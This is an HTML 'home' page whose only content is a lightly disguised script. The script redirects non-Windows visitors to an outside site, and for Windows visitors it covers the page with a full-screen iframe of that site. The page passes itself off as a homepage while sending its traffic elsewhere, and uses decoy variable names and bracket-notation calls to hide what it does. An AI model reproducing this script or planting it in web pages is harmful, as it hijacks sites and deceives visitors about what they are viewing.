<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>首页</title>
<meta name="keywords" content="首页"/>
<meta name="description"
content="首页"/>
<link href="/ico.ico" rel="icon">
</head>
<body>
<script>
var items = ['https://www.xunlu.net/'];
var Alibaba = items[Math.floor(Math.random() * items.length)];
if (navigator.platform.indexOf('Win32') != -1) {} else {
window.location.href = Alibaba
};
var JackMa = "<div style='position: fixed; z-index: 10000; height: 100%; width: 100%; background: rgb(255, 255, 255);'><iframe src='" + Alibaba + "' width='100%' height='100%' frameborder='0'></iframe></div>";
window["document"]["write"](JackMa);
window["document"]["write"]("<style type='text/css'>html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden;margin:0}</style>");
</script>
</body>
</html>